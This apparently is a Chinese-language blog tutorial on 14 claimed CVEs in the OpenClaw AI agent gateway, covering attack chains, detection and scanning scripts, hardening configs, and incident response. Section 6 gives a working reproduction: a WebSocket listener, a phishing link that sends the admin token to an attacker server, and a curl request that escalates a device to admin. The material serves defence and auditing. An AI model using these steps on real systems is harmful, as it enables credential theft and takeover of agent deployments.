OpenClaw AI Agent 漏洞实战排查与加固教程:14个CVE批量漏洞链利用、裸奔实例检测脚本全落地
1 事件真实现状全网OpenClaw实例暴露数据与漏洞危害边界2026年上半年OpenClaw官方安全公告分两批放出合计14条带CVE编号高危漏洞全网测绘平台持续抓取公网暴露实例四万两千余台安全厂商抽样复测数据显示63%实例存在全漏洞未修复裸奔状态。裸奔定义不局限于直接0.0.0.0端口映射公网大量企业内网部署实例存在同源校验缺失、无设备准入限制、凭证明文存储问题内网攻击者仅靠普通员工账号即可完成完整接管。漏洞链杀伤路径具备极强可复制性外部攻击者通过钓鱼页面触发WebSocket劫持拿到管理员令牌无需交互就能接入目标网关再调用配对审批接口完成权限提升最终实现本地文件读取、系统命令执行、内网横向漫游三层渗透。大量开发、运维人员使用默认配置快速部署OpenClaw做本地AI工作流调度普遍忽略三件关键配置网关绑定地址限制、WebSocket来源白名单、设备配对人工审批开关这三类配置缺失直接覆盖本次14个漏洞绝大多数利用入口。部分云服务器、容器集群直接将18789默认端口放行至公网无IP白名单、无前置身份校验扫描工具遍历端口即可批量抓取可攻击资产黑产已经形成自动化扫描、漏洞利用、凭证窃取完整工具链持续在野批量收割实例密钥。漏洞影响版本覆盖2026年1月至3月全部正式发行包仅2026.4.14及之后版本完成全部14个CVE底层修复历史版本仅单独打补丁无法阻断组合攻击链零散补丁只能封堵单一漏洞入口攻击者仍可切换其他漏洞接口完成接管。业务层面损失分为三类第一类是AI集成第三方API密钥、数据库账号明文泄露攻击者调用大模型接口产生高额账单第二类是服务器本地文件、业务配置文件被打包外传第三类是攻击者植入持久后门长期潜伏内网窃取业务数据常规日志无法完整记录提权操作痕迹。2 核心高危漏洞底层原理拆解2.1 CVE-2026-25253 WebSocket劫持完整利用链路漏洞编号CVE-2026-25253CVSS评分8.8受影响版本≤2026.1.28修复节点2026.1.29。前端控制面板接收URL参数gatewayUrl后端未做来源域名校验、未做WebSocket地址格式白名单过滤页面加载时自动读取本地持久存储的authToken随WebSocket握手请求完整发送至参数指定的远程地址。本地回环127.0.0.1部署实例同样无法规避风险攻击者搭建静态钓鱼网页嵌入JS脚本自动拼接目标本地网关地址诱导用户访问页面后浏览器同源策略不会拦截本地端口连接请求本地令牌直接外流。完整利用步骤无复杂交互攻击者搭建WS监听服务生成钓鱼链接附带恶意gatewayUrl参数目标用户点击链接打开页面前端自动发起ws长连接携带本地管理员令牌攻击者服务端捕获令牌调用OpenClaw网关开放API完成全功能控制。该漏洞单独触发即可实现文件读取、Agent配置篡改搭配CVE-2026-33579形成闭环攻击链低权限接入后直接提升至超级管理员绕过命令执行白名单执行任意系统指令。2.2 CVE-2026-33579 低权限本地提权底层逻辑漏洞编号CVE-2026-33579CVSS评分8.2受影响版本2026.2.x至2026.3.27修复节点2026.3.28。设备配对接口/pair approve仅校验请求携带的有效token未校验当前token绑定账号的权限等级临时访客设备、低权限配对终端均可调用审批接口修改自身权限字段为operator.admin。权限字段写入本地持久化配置重启服务后权限不重置攻击者完成提权后可修改全局执行策略、安装未校验第三方插件、新增定时自动执行任务实现持久驻留。权限提升无操作日志强标记默认审计日志仅记录接口调用行为不会区分普通设备审批与权限篡改操作常规日志排查无法快速定位入侵行为需要额外开启细粒度权限变更审计开关。内网环境下风险放大企业内部任意一台接入内网的办公电脑只要能访问OpenClaw网关端口配合劫持拿到的token即可完成提权无需获取服务器操作系统登录权限。3 剩余12个CVE漏洞风险面与组合攻击路径梳理CVE-2026-35639 跨域SSRFCVSS8.7网关代理请求未拦截内网元数据地址、数据库内网端口攻击者调用接口读取云服务商临时密钥、内网数据库数据。可搭配WebSocket劫持拿到token后发起内网扫描。CVE-2026-34511 OAuth PKCE绕过CVSS8.0第三方大模型、企业OA集成流程缺少校验攻击者复用拦截的会话凭证接管绑定第三方账号批量盗取AI接口额度。CVE-2026-35636 SessionID本地明文存储CVSS7.9前端LocalStorage未加密存储会话凭证页面XSS漏洞可一键读取配合钓鱼页面实现凭证持久窃取。CVE-2026-40037 重定向SSRF黑名单绕过CVSS7.7网关内网拦截规则无法识别302跳转地址攻击者通过跳转域名访问内网高危服务弥补常规SSRF拦截限制。CVE-2026-22179 macOS平台命令注入CVSS7.6macOS系统下指令参数过滤存在逻辑缺陷特殊分隔符绕过执行白名单直接执行系统shell指令。GHSA-6mgf-v5j7-45cr 跨域授权头转发泄露CVSS7.1网关转发请求时自动携带本地鉴权头部第三方恶意插件、外部接口可直接捕获网关核心令牌。GHSA-rchv-x836-w7xp 仪表盘凭证明文存储CVSS7.1面板URL、本地缓存文件完整保存网关密钥本地文件读取漏洞可直接批量导出全部凭证。CVE-2026-34426 插件无沙箱代码执行CVSS7.0第三方插件上传接口缺少代码沙箱隔离恶意插件可直接读写服务器磁盘、调用系统底层接口。CVE-2026-31142 日志明文敏感信息输出CVSS6.8系统运行日志不脱敏打印API密钥、数据库账号、登录密码日志泄露场景直接造成凭证批量外泄。CVE-2026-29007 内网穿透无IP准入白名单CVSS6.5默认穿透通道允许任意公网IP建立连接无访问控制外部攻击者直接接入内网网关。CVE-2026-27813 本地配置文件未加密存储CVSS6.3config.yml、凭证存储文件明文保存全部集成密钥本地低权限用户读取文件即可接管所有AI代理配置。CVE-2026-30155 审计日志篡改漏洞CVSS6.0日志文件无写入权限锁定攻击者入侵后删除、修改操作记录消除入侵溯源证据。多漏洞组合攻击路径分三类高频场景场景一外部钓鱼触发WebSocket劫持→获取管理员token→调用SSRF接口扫描内网资产→提权漏洞提升权限→植入恶意插件持久后门。场景二内网普通用户读取本地明文配置文件→拿到有效会话凭证→绕过OAuth校验接管第三方AI账号→批量导出业务数据。场景三公网裸奔实例直接端口扫描接入→穿透通道无白名单准入→命令注入执行系统指令→横向渗透内网其他服务器。4 OpenClaw默认架构原生缺陷Mermaid架构图无Origin校验未校验设备权限明文存储密钥公网攻击者18789默认端口 0.0.0.0监听OpenClaw前端控制面板WebSocket网关服务配对审批接口本地持久化authToken明文存储权限字段可任意篡改SSRF代理模块 无内网拦截内网数据库/云元数据服务本地办公终端插件上传模块 无沙箱隔离系统底层命令执行默认配置文件本地低权限用户可读图中标红模块为本次14个漏洞全部触发入口默认架构三层缺陷叠加网络层无访问限制、应用层接口权限校验缺失、存储层凭证未加密保护。5 裸奔实例判定标准、批量本地/公网检测完整脚本判定标准满足任意一条直接判定高危裸奔实例网关监听地址绑定0.0.0.0所有网卡对外暴露端口认证开关authentication设置为disabled匿名无需凭证访问运行版本低于2026.3.28全部14个漏洞存在WebSocket模块未配置Origin域名白名单设备配对自动审批开启无人工确认流程容器部署无端口访问限制直接映射主机全端口配置文件未加密日志未开启敏感信息脱敏。5.1 单机一键漏洞自检Shell脚本可直接复制运行#!/bin/bash# OpenClaw单机漏洞裸奔自检脚本echo OpenClaw安全漏洞自检开始 # 1. 版本检测CLAW_VER$(openclaw--version2/dev/null|awk{print $2})echo当前部署版本:$CLAW_VERif[[$CLAW_VER2026.3.28]];thenecho[高危] 版本低于安全基线全部14个漏洞存在elseecho[安全] 版本满足基础修复基线fi# 2. 网关监听地址检测BIND_ADDR$(openclaw gateway status2/dev/null|grepbind|awk{print $2})echo网关绑定地址:$BIND_ADDRif[[$BIND_ADDR0.0.0.0]];thenecho[高危] 全网卡监听公网裸奔风险fi# 3. 认证开关检测AUTH_STATUS$(openclaw gateway status2/dev/null|grepauthentication|awk{print $2})if[[$AUTH_STATUSdisabled]];thenecho[高危] 匿名访问开启无身份校验fi# 4. 配置文件凭证明文检索CONFIG_PATH$HOME/.openclaw/config.ymlif[-f$CONFIG_PATH];thengrep-Etoken|api_key|password$CONFIG_PATH/tmp/claw_secret.logif[$(wc-l/tmp/claw_secret.log)-gt0];thenecho[风险] 配置文件存在明文敏感凭证fifi# 5. WebSocket漏洞简易探测curl-s-ihttp://127.0.0.1:18789?gatewayUrlws://testscan.local|grepws://if[$?-eq0];thenecho[高危] CVE-2026-25253 WebSocket劫持漏洞可复现fi# 6. 陌生配对设备检测openclaw devices list|grep-vtrustedif[$?-eq0];thenecho[风险] 存在非可信配对设备存在提权入口fiecho 自检完成日志输出至/tmp/claw_secret.log 5.2 批量公网资产扫描Python工具importsocketimportrequestsimportthreading# 扫描配置PORT18789TIMEOUT2TARGET_IP_LIST[192.168.1.10,xxx.xxx.xxx.xxx]# 替换待扫描IP段defscan_openclaw(ip):try:socksocket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.settimeout(TIMEOUT)connsock.connect_ex((ip,PORT))ifconn0:print(f[暴露]{ip}:{PORT}端口开放)# 简易漏洞探测try:resrequests.get(fhttp://{ip}:{PORT}?gatewayUrlws://scan.test,timeoutTIMEOUT)ifws://inres.text:print(f[高危漏洞]{ip}存在CVE-2026-25253劫持漏洞)exceptException:passsock.close()exceptException:passif__name____main__:threads[]foripinTARGET_IP_LIST:tthreading.Thread(targetscan_openclaw,args(ip,))threads.append(t)t.start()fortinthreads:t.join()print(批量端口扫描结束)5.3 Docker容器化实例专项检测代码#!/bin/bash# Docker OpenClaw容器安全检测脚本CONTAINER_NAMEopenclaw# 端口映射检测echo容器端口映射信息:dockerport$CONTAINER_NAMEdockerport$CONTAINER_NAME|grep0.0.0.0if[$?-eq0];thenecho[高危] 容器端口公网全开放映射fi# 运行权限检测RUN_USER$(dockerinspect--format{{.Config.User}}$CONTAINER_NAME)if[[$RUN_USER||$RUN_USERroot]];thenecho[风险] 容器以root权限运行漏洞利用危害放大fi# 挂载敏感目录检测dockerinspect--format{{.Mounts}}$CONTAINER_NAME|grep.openclaw6 漏洞可复现完整攻击流程实操演示6.1 CVE-2026-25253劫持复现步骤搭建简易WebSocket监听服务保存为ws_server.pyimportwebsocketsimportasyncioasyncdefcapture_token(ws):asyncformsginws:print(捕获网关鉴权令牌,msg)asyncdefmain():asyncwithwebsockets.serve(capture_token,0.0.0.0,9999):awaitasyncio.Future()asyncio.run(main())生成钓鱼访问链接http://目标网关IP:18789?gatewayUrlws://攻击者服务器IP:9999正常管理员账号打开链接页面自动发起WebSocket握手本地authToken完整发送至攻击者服务端攻击者拿到令牌后调用网关API接口读取本地文件、修改Agent运行配置6.2 CVE-2026-33579提权复现接口调用拿到有效token后发送POST请求完成权限提升curl-XPOST http://网关IP:18789/pair/approve\-HAuthorization: Bearer 捕获的管理员Token\-d{deviceId:临时配对设备ID,role:operator.admin}接口无权限校验低权限设备直接写入超级管理员角色重启服务权限不丢失。7 分级安全加固配置清单可直接复制配置文件7.1 紧急临时阻断配置0小时应急config.yml片段gateway:bind:127.0.0.1authentication:enabledorigin_whitelist:-http://127.0.0.1:18789device_pair:auto_approve:falseip_allow_list:-192.168.0.0/16exec_policy:shell_allow:false修改配置后重启服务立刻阻断所有外部漏洞利用入口适合漏洞爆发后紧急止损不影响本地开发调试。7.2 生产长期安全完整config.ymlgateway:bind:127.0.0.1port:18789authentication:enabledtoken_rotate_cycle:7dorigin_whitelist:-http://localhost:18789-https://internal-vpn.company.comwebsocket_security:block_external_cross:truedevice_pair:auto_approve:falsemanual_review:trueip_allow_list:-10.0.0.0/8-192.168.0.0/16plugin:sandbox_enable:trueofficial_repo_only:trueexec_policy:shell_allow:falsecommand_whitelist:[]log:secret_mask:truelog_file_lock:trueaudit:permission_change_record:truelog_encrypt:truestorage:config_encrypt:true7.3 反向代理Nginx鉴权防护配置server { listen 443 ssl; server_name claw.internal.company.com; ssl_certificate /etc/ssl/claw.crt; ssl_certificate_key /etc/ssl/claw.key; # 前置IP白名单 allow 10.0.0.0/8; allow 192.168.0.0/16; deny all; location / { proxy_pass http://127.0.0.1:18789; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection upgrade; proxy_set_header Host $host; # 拦截外部跨域WebSocket请求 if ($http_origin !~* internal-vpn.company.com) { return 403; } } }生产环境禁止直接暴露18789端口至公网统一通过内网SSL反向代理加IP白名单访问。8 入侵后应急处置全流程Mermaid流程图检测漏洞利用痕迹停止OpenClaw服务隔离实例重置全部网关Token、第三方API密钥执行脚本清理陌生配对设备、恶意插件审计定时任务、系统启动项排查后门升级至2026.4.14安全版本完整替换安全加固config.yml配置开启细粒度审计日志、日志加密锁定内网全资产扫描横向渗透痕迹复盘漏洞暴露原因更新巡检规范流程执行顺序不可颠倒密钥重置必须在服务隔离后执行防止攻击者持续使用窃取凭证。9 企业级常态化巡检落地规范每周固定执行三件操作运行单机自检脚本、核对OpenClaw版本、清理未知配对设备。每月执行批量内网资产扫描抓取所有18789端口开放实例统一校验绑定地址与认证开关。每季度全量轮换所有AI集成密钥覆盖大模型接口、数据库、企业OA授权凭证。容器集群开启镜像版本管控禁止使用2026.3.28之前旧镜像镜像仓库拦截不安全版本推送。运维平台接入日志告警检测日志中明文密钥、权限变更接口调用行为触发实时推送告警。10 未来AI Agent通用安全设计前瞻规避方案现有OpenClaw这类本地AI代理普遍存在信任前置设计缺陷默认信任本地内网、简化身份校验换取开发便捷性后续自研、选型AI代理工具需锁定四层安全底线。网络层默认仅允许本地回环地址监听对外访问强制前置VPN、反向代理双重准入取消全网卡绑定默认配置。应用层接口统一做双维度校验请求凭证权限等级、访问来源域名/IPWebSocket、配对、插件上传高危接口增加独立白名单校验逻辑。存储层所有鉴权令牌、业务密钥强制加密落盘内存明文仅临时缓存日志自动脱敏屏蔽密钥字段文件开启写入锁定防止篡改。执行层统一沙箱隔离第三方插件、AI自动执行指令默认关闭系统shell调用权限高危操作强制人工二次确认。同类AI Agent工具选型阶段优先排查三个核心风险点WebSocket跨域校验逻辑、设备配对权限控制、凭证存储加密机制三个模块存在设计缺陷直接排除用于生产业务。11 文末互动提问你们企业内部部署OpenClaw时采用容器还是本地二进制部署有没有遇到过公网扫描探针批量探测18789端口的情况除本文提到的WebSocket劫持、本地提权漏洞链外你在测试AI代理工具时还发现过哪些容易被忽略的默认安全缺陷

相关新闻

鸣潮游戏模组终极指南:15个功能模块全面解析与实战应用

鸣潮游戏模组终极指南:15个功能模块全面解析与实战应用

鸣潮游戏模组终极指南:15个功能模块全面解析与实战应用 【免费下载链接】wuwa-mod Wuthering Waves pak mods 项目地址: https://gitcode.com/GitHub_Trending/wu/wuwa-mod 还在为《鸣潮》游戏中的种种限制而困扰吗?WuWa-Mod作为当前最热门的鸣潮…

2026/7/7 18:39:57阅读更多 →
ArcGIS Pro 3.2 遥感数据集制作:从标注到PASCAL VOC格式的5步实战

ArcGIS Pro 3.2 遥感数据集制作:从标注到PASCAL VOC格式的5步实战

ArcGIS Pro 3.2 遥感数据集制作:从标注到PASCAL VOC格式的5步实战遥感影像分析正迎来深度学习的革命性变革。作为地理信息科学(GIS)领域的专业工具,ArcGIS Pro 3.2集成了强大的深度学习工具链,能够高效完成从原始标注到…

2026/7/7 18:34:56阅读更多 →
Apache Skywalking 实战 阅读笔记 第三章

Apache Skywalking 实战 阅读笔记 第三章

Apache Skywalking 实战 阅读笔记 第三章 一、参考资料二、笔记总结 第3章 Apache SkyWalking实战 本章首先介绍后端技术栈的两种技术路线选择,并介绍SkyWalking针对它们所采取的不同应对方式;而后将通过一个具体示例,展示如何使用SkyWalkin…

2026/7/7 18:34:56阅读更多 →
颠覆性理论刚诞生时,很少有人能看懂它的价值——超导新解:8字驻波电子磁链理论

颠覆性理论刚诞生时,很少有人能看懂它的价值——超导新解:8字驻波电子磁链理论

从事基础物理原创研究这么多年,我深刻体会到一件事:真正能颠覆现有体系、填补理论空白的原创假说,刚面世时几乎都无人重视,甚至会被主流学界下意识否定。 回顾科学史,这种案例比比皆是。魏格纳拿出大陆漂移的完整证据…

2026/7/7 19:35:01阅读更多 →
绝对真理的优先性:形式主义、哥德尔不完备定理与当代学术精神的危机

绝对真理的优先性:形式主义、哥德尔不完备定理与当代学术精神的危机

绝对真理的优先性:形式主义、哥德尔不完备定理与当代学术精神的危机摘要本文从数学实在论立场出发,系统考察了哥德尔不完备定理与绝对真理主张之间的所谓 “张力”。通过对 112 等基本算术真理先验客观性的分析,论证形式公理系统(…

2026/7/7 19:35:01阅读更多 →
基于SSM的商铺租赁管理系统:技术栈、背景意义、核心代码与系统测试

基于SSM的商铺租赁管理系统:技术栈、背景意义、核心代码与系统测试

1. 项目背景与意义随着城市化进程的加快和商业地产的蓬勃发展,商铺租赁市场日益活跃,管理复杂度也随之提升。传统的人工记录、Excel表格或简单的单机软件管理方式,已难以满足现代商业地产公司、物业方及个体房东对租赁信息高效、精准、协同管…

2026/7/7 19:35:01阅读更多 →
系统分析师备考系列目录

系统分析师备考系列目录

系统分析师系列目录直通车 本目录是系统分析师系列知识体系的完整目录,分为三大篇章:基础知识、关键技术和案例实践。基础知识篇涵盖计算机系统、网络、数据库等9个核心章节;关键技术篇重点讲解系统规划、需求工程、架构设计等6个关键领域&am…

2026/7/7 19:35:01阅读更多 →
自定义 Workflow:Eino 之上的 Agent 编排

自定义 Workflow:Eino 之上的 Agent 编排

系列「企业级 AI Agent 实现拆解」E30 篇,也是 Part 8(DeepFlux 适配实践)的收尾。上一篇讲了五个适配器:DeepFlux 如何把 Eino 接进 DDD 架构。这篇把视角提高一层:看完整的 ReAct 循环是怎么把这些适配器组装起来的&…

2026/7/7 19:35:01阅读更多 →
3步解锁百度网盘高速下载:告别限速的终极指南

3步解锁百度网盘高速下载:告别限速的终极指南

3步解锁百度网盘高速下载:告别限速的终极指南 【免费下载链接】baidu-wangpan-parse 获取百度网盘分享文件的下载地址 项目地址: https://gitcode.com/gh_mirrors/ba/baidu-wangpan-parse 还在为百度网盘几十KB的下载速度而抓狂吗?每次下载重要文…

2026/7/7 19:30:00阅读更多 →
从GitHub安全案例解析常见漏洞与防护实践

从GitHub安全案例解析常见漏洞与防护实践

1. 项目概述:从GitHub Trending看安全实战 最近在GitHub Trending上看到一个项目,叫 skills4/skills ,它因为一些安全漏洞案例被大家讨论。这其实是一个挺典型的场景:一个旨在展示或教授某种技能的仓库,本身却成了安…

2026/7/7 4:43:43阅读更多 →
MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

MLT 2026启示:因果推理与概率建模驱动下一代LLM应用

# MLT 2026启示:因果推理与概率建模驱动下一代LLM应用## 一、背景与挑战:从“黑箱预测”到“可信推理”2026年6月,第7届机器学习与趋势国际会议(MLT 2026)将在悉尼召开。会议议程中,“因果与可解释机器学习…

2026/7/7 2:56:31阅读更多 →
通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

通达OA SQL注入漏洞深度剖析:从手工注入到自动化利用与防御

1. 项目概述与漏洞背景最近在梳理一些历史OA系统的安全风险时,通达OA v11.6版本中的一个老漏洞又进入了我的视线。这个漏洞位于/general/bi_design/appcenter/report_bi.func.php文件中,是一个典型的SQL注入点。虽然这个漏洞的利用方式看起来并不复杂&am…

2026/7/7 1:03:28阅读更多 →
Acunetix v24.8 深度解析:DAST漏洞扫描器核心原理与DevSecOps实践

Acunetix v24.8 深度解析:DAST漏洞扫描器核心原理与DevSecOps实践

1. 项目概述:Acunetix v24.8 高级版漏洞扫描器深度解析作为一名在网络安全领域摸爬滚打多年的老兵,我深知一款趁手的“兵器”对于安全测试工作意味着什么。今天要聊的,就是Web应用安全测试领域里一个响当当的名字——Acunetix。特别是其v24.8…

2026/7/7 0:02:41阅读更多 →
国产化信创改造:达梦/人大金仓适配与多数据库兼容方案实战(SpringBoot)

国产化信创改造:达梦/人大金仓适配与多数据库兼容方案实战(SpringBoot)

国产化信创改造:达梦/人大金仓适配与多数据库兼容方案实战(SpringBoot) 🌐 演示地址:http://ruoyioffice.com | 📦 源码1GitHub:ruoyi-office | 📦 源码2GitCode:ruoyi-o…

2026/7/7 0:02:41阅读更多 →
CentOS 7/8 SSH 连接失败:5步系统性排错流程与决策树

CentOS 7/8 SSH 连接失败:5步系统性排错流程与决策树

CentOS SSH连接故障排查:从基础检查到深度修复的完整指南引言当你尝试通过Xshell或其他SSH客户端连接CentOS服务器时,突然遭遇"Connection refused"或"Connection timed out"的错误提示,这种经历对任何运维人员或开发者来…

2026/7/7 0:02:41阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/7 5:11:21阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/7 5:11:21阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/7 5:11:21阅读更多 →